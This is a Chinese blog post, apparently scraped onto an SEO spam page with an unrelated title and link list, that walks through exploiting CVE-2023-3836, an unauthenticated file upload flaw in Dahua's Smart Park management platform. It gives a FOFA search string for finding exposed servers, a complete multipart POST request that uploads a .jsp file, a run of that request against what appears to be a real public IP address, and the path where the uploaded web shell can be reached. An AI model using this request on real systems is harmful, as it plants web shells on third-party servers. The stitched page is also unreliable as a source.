当前位置: 首页 > news >正文

兰州网页网站如何优化排名

news 2025/8/24 20:01:01
兰州网页,网站如何优化排名,在线看国内永久免费crm,能够做渗透的网站文章目录 CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现0x01 前言0x02 漏洞描述0x03 影响范围0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现 0x01 前言 免责声…

文章目录

  • CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响范围
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现

CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

在大华智慧园区管理中发现了一个被归类为严重的漏洞,最高可达20230713。此漏洞影响文件 /emap/devicePoint_addImgIco?hasSubsystem=true 的未知代码。对参数上传的操作会导致无限制上传。攻击可以远程发起。该漏洞已向公众披露,并可能被使用。
在这里插入图片描述

0x03 影响范围

大华智慧园区综合管理平台

0x04 漏洞环境

fofa:“/WPMS/asset/lib/gridster/”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (POST)

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: ip:port
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="***.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary******
--f3aeb22be281d77542546a2f71e20982--

3.复现

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 202.96.139.59:9080
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary123456
--f3aeb22be281d77542546a2f71e20982--

在这里插入图片描述访问上传文件
shell地址链接:

http://127.0.0.1/upload/emap/society_new/ico_res_**********.jsp

注意:ico_res_**********.jsp 替换成上传数据包回显的文件名
在这里插入图片描述

http://www.yidumall.com/news/3442.html

相关文章:

  • 聊城做网站哪家好兰州模板网站seo价格
  • 黄冈网站官方登录平台营销型网站建设服务
  • 网站为什么做静态爱网站关键词查询工具长尾
  • 品牌制作网站下载谷歌浏览器并安装
  • 苏州建设交通官方网站开封网络推广公司
  • 怎样修改网站模板上海公司网站seo
  • 网站APP注册做任务网络营销企业是什么
  • 团购网站开发seo人员的职责
  • 网页制作网站知识网站的推广方式
  • 网站建设技术网站建设百度com打开
  • 苏州网站建设哪家快谷歌搜索引擎免费入口
  • 网站升级建设招标公告湘潭营销型网站建设
  • 制作网站设计的总结mac日本官网入口
  • 资金盘网站开发多少钱长沙百度网站优化
  • 网站开发看书百度一下首页手机版
  • 网站动态url和静态url的优劣势站内seo内容优化包括
  • 自己的网站怎么做app网站权重怎么提高
  • 网站开发所需开发环境长沙seo结算
  • 网站制作文案杭州最近的头条新闻
  • 怎么做刷业网站武汉网站维护公司
  • 外贸网站优化好项目推荐平台
  • 郑州网站建设 服务创业百度关键词排名查询接口
  • 专业做汽配的网站外媒头条最新消息
  • 在线图片生成网页链接武安百度seo
  • 美国哪个网站做diy电脑版新乡seo顾问
  • 如何做网站的关键词排名网络营销到底是个啥
  • 个人购物网站搭建整站seo优化哪家好
  • 柳州做网站设计的公司四川seo推广公司
  • 昆明市城市建设档案馆网站最近新闻内容
  • wordpress ajax 注册优化网站排名